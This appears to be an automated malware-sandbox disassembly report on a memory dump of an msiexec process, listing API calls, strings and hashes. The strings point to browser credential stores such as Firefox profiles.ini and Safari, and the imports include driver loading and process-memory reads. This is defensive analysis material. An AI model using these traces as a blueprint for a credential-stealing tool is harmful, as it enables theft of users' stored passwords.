                                                                                          • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                        • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                        Similarity
                                                                                        • API ID: ??2@FilePointermemcpy
                                                                                        APIs
                                                                                          • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                        • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateErrorHandleLastRead
                                                                                        APIs
                                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                        Similarity
                                                                                        • API ID: ??2@??3@
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: free
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: free
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: free
                                                                                        APIs
                                                                                        • EmptyClipboard.USER32 ref: 004098EC
                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                        • GetLastError.KERNEL32 ref: 0040995D
                                                                                        • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                        • GetLastError.KERNEL32 ref: 00409974
                                                                                        • CloseClipboard.USER32 ref: 0040997D
                                                                                        Similarity
                                                                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                        APIs
                                                                                        • EmptyClipboard.USER32 ref: 00409882
                                                                                        • wcslen.MSVCRT ref: 0040988F
                                                                                        • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                        • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                        • CloseClipboard.USER32 ref: 004098D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32 ref: 004182D7
                                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                        • LocalFree.KERNEL32(?), ref: 00418342
                                                                                        • free.MSVCRT ref: 00418370
                                                                                          • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                          • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                        • String ID: OsError 0x%x (%u)
                                                                                        APIs
                                                                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                        • OpenClipboard.USER32(?), ref: 00411878
                                                                                        • GetLastError.KERNEL32 ref: 0041188D
                                                                                          • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                          • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                          • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                          • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                          • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                          • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                          • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                          • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                          • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                        • String ID:
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: NtdllProc_Window
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • _wcsicmp.MSVCRT ref: 004022A6
                                                                                        • _wcsicmp.MSVCRT ref: 004022D7
                                                                                        • _wcsicmp.MSVCRT ref: 00402305
                                                                                        • _wcsicmp.MSVCRT ref: 00402333
                                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                        • memset.MSVCRT ref: 0040265F
                                                                                        • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                          • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                        • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                        • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                        • String ID: :stringdata$ftp://$http://$https://
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                        • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                        • GetDC.USER32 ref: 004140E3
                                                                                        • wcslen.MSVCRT ref: 00414123
                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                        • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                        • _snwprintf.MSVCRT ref: 00414244
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                        • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                        • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                        • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                        • String ID: %s:$EDIT$STATIC
                                                                                        APIs
                                                                                        • EndDialog.USER32(?,?), ref: 00413221
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                        • memset.MSVCRT ref: 00413292
                                                                                        • memset.MSVCRT ref: 004132B4
                                                                                        • memset.MSVCRT ref: 004132CD
                                                                                        • memset.MSVCRT ref: 004132E1
                                                                                        • memset.MSVCRT ref: 004132FB
                                                                                        • memset.MSVCRT ref: 00413310
                                                                                        • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                        • memset.MSVCRT ref: 004133C0
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                        • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                        • wcscpy.MSVCRT ref: 0041341F
                                                                                        • _snwprintf.MSVCRT ref: 0041348E
                                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                        • SetFocus.USER32(00000000), ref: 004134B7
                                                                                        Strings
                                                                                        • {Unknown}, xrefs: 004132A6
                                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                        • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                        • EndDialog.USER32(?,?), ref: 0040135E
                                                                                        • DeleteObject.GDI32(?), ref: 0040136A
                                                                                        • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                        • ShowWindow.USER32(00000000), ref: 00401398
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                        • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                        • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                        Similarity
                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                        • String ID:
                                                                                        • API String ID: 829165378-0
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00404172
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                        • wcscpy.MSVCRT ref: 004041D6
                                                                                        • wcscpy.MSVCRT ref: 004041E7
                                                                                        • memset.MSVCRT ref: 00404200
                                                                                        • memset.MSVCRT ref: 00404215
                                                                                        • _snwprintf.MSVCRT ref: 0040422F
                                                                                        • wcscpy.MSVCRT ref: 00404242
                                                                                        • memset.MSVCRT ref: 0040426E
                                                                                        • memset.MSVCRT ref: 004042CD
                                                                                        • memset.MSVCRT ref: 004042E2
                                                                                        • _snwprintf.MSVCRT ref: 004042FE
                                                                                        • wcscpy.MSVCRT ref: 00404311
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                        • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                        • API String ID: 2454223109-1580313836
                                                                                        APIs
                                                                                          • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                        • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                        • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                        • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                        • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                        • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                        • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                          • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                          • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                        • API String ID: 4054529287-3175352466
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                        • API String ID: 3143752011-1996832678
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                        • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                        • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                        • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                        • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                        • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                        • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                        • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                        • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                        • API String ID: 667068680-2887671607
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                        • API String ID: 1607361635-601624466
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _snwprintf$memset$wcscpy
                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                        • API String ID: 2000436516-3842416460
                                                                                        APIs
                                                                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                          • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                          • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                          • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                        • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                        • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                        • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                        • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                        • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                        • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                        • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                        • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                        • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                        • String ID:
                                                                                        • API String ID: 1043902810-0
                                                                                        APIs
                                                                                        • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                        • _snwprintf.MSVCRT ref: 0044488A
                                                                                        • wcscpy.MSVCRT ref: 004448B4
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ??2@??3@_snwprintfwcscpy
                                                                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                        • API String ID: 2899246560-1542517562
                                                                                        • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                        • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                        • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                        • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040DBCD
                                                                                        • memset.MSVCRT ref: 0040DBE9
                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                          • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                          • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                          • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                        • wcscpy.MSVCRT ref: 0040DC2D
                                                                                        • wcscpy.MSVCRT ref: 0040DC3C
                                                                                        • wcscpy.MSVCRT ref: 0040DC4C
                                                                                        • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                        • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                        • wcscpy.MSVCRT ref: 0040DCC3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                        • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                        • API String ID: 3330709923-517860148
                                                                                        • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                        • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                        • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                        • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                        APIs
                                                                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                          • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                        • memset.MSVCRT ref: 0040806A
                                                                                        • memset.MSVCRT ref: 0040807F
                                                                                        • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
